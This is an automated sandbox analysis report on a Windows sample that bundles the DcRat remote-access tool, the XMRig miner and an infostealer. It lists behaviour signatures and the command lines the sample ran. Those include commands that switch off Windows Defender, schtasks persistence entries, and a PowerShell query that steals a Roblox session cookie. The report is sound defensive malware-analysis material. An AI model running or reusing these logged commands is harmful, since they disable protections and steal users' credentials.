Malware Analysis Report

2024-12-07 17:42

Sample ID 241112-wl38dswrew
Target LunoLoader_pixelplanet.fun.exe
SHA256 7454fcc2c2c9e1b2c9ea16874d70fbfcfdf7823f4ed79d91e6dfbdeadc47d88b
Tags
dcrat xmrig collection credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation rat spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7454fcc2c2c9e1b2c9ea16874d70fbfcfdf7823f4ed79d91e6dfbdeadc47d88b

Threat Level: Known bad

The file LunoLoader_pixelplanet.fun.exe was found to be: Known bad.

Malicious Activity Summary

dcrat xmrig collection credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation rat spyware stealer upx

xmrig

Process spawned unexpected child process

Xmrig family

Dcrat family

DcRat

DCRat payload

XMRig Miner payload

Creates new service(s)

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Stops running service(s)

Clipboard Data

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Unsecured Credentials: Credentials In Files

Accesses cryptocurrency files/wallets, possible credential harvesting

Obfuscated Files or Information: Command Obfuscation

Power Settings

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

UPX packed file

Hide Artifacts: Hidden Files and Directories

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Wi-Fi Discovery

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

System Location Discovery: System Language Discovery

Browser Information Discovery

Uses Volume Shadow Copy service COM API

Modifies data under HKEY_USERS

Runs ping.exe

Modifies registry class

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Detects videocard installed

Views/modifies file attributes

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Gathers system information

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-12 18:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 18:01

Reported

2024-11-12 18:02

Platform

win11-20241007-en

Max time kernel

53s

Max time network

53s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe"

Signatures

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Process spawned unexpected child process

Description Indicator Process Target Count
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe 21

Xmrig family

xmrig

xmrig

miner xmrig

DCRat payload

rat
Description Indicator Process Target Count
N/A N/A N/A N/A 3

XMRig Miner payload

miner
Description Indicator Process Target Count
N/A N/A N/A N/A 7

Creates new service(s)

persistence execution

Drops file in Drivers directory

Description Indicator Process Target Count
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A 2
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe N/A 1

Stops running service(s)

evasion execution

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target Count
N/A raw.githubusercontent.com N/A N/A 11
N/A discord.com N/A N/A 2
N/A pastebin.com N/A N/A 2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target Count
N/A N/A C:\Windows\system32\tasklist.exe N/A 4

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2844 set thread context of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe
PID 2844 set thread context of 1984 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe

UPX packed file

upx
Description Indicator Process Target Count
N/A N/A N/A N/A 64

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Program Files (x86)\Windows Media Player\fr-FR\5940a34987c991 C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\ebf1f9fa8afd6d C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Program Files\Microsoft Office\root\loc\System.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\loc\System.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Program Files\Microsoft Office\root\loc\27d1bcfc3c54e0 C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\fr-FR\OfficeClickToRun.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Windows\fr-FR\e6c9b481da804f C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A
File created C:\Windows\CSC\powershell.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A

Launches sc.exe

Description Indicator Process Target Count
N/A N/A C:\Windows\system32\sc.exe N/A 4

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\conhost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Recovery\WindowsRE\wininit.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe N/A 8
N/A N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe N/A 6
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 16
N/A N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A 24
N/A N/A C:\Windows\system32\conhost.exe N/A 10

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target Count
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A 8
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A 8
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\conhost.exe N/A 1
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe N/A 1
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A 3
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 5
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A 2
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A 1
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A 1
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A 1
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A 1

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 4900 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe 2
PID 1180 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe 3
PID 2096 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe C:\Windows\SysWOW64\WScript.exe 3
PID 1180 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe 2
PID 2844 wrote to memory of 1392 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe 9
PID 1180 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe 2
PID 2844 wrote to memory of 1984 N/A C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe C:\Windows\system32\conhost.exe 5
PID 2004 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe 2
PID 2360 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 2360 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 2360 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 2360 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 3372 wrote to memory of 2564 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe 3
PID 2564 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe 2
PID 2360 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 2360 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 4180 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 2
PID 3852 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe 2
PID 2360 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 2360 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 2360 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 2292 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 2
PID 3776 wrote to memory of 2940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe 2
PID 2360 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 2360 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 2
PID 2360 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe 1

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target Count
N/A N/A C:\Windows\system32\attrib.exe N/A 3

Processes

C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe

"C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\fK1YYsKuG.vbe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "XLZQHCLS"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XLZQHCLS"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"

C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe

C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

conhost.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ ​ .scr'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\TPw4JEK.bat" "

C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe

"C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe'

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ ​ .scr'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office\root\loc\System.exe'" /f

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\root\loc\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\root\loc\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Default\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe'" /f

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Windows\fr-FR\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\fr-FR\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Windows\fr-FR\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Recovery\WindowsRE\wininit.exe

"C:\Recovery\WindowsRE\wininit.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5.tmp" "c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\CSC1258BA46459645629AF8383C4D4B32DF.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f952880f-c74c-4b19-b008-6f790cefae50.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3deb661f-065c-4bb4-a64e-9c6422f27542.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

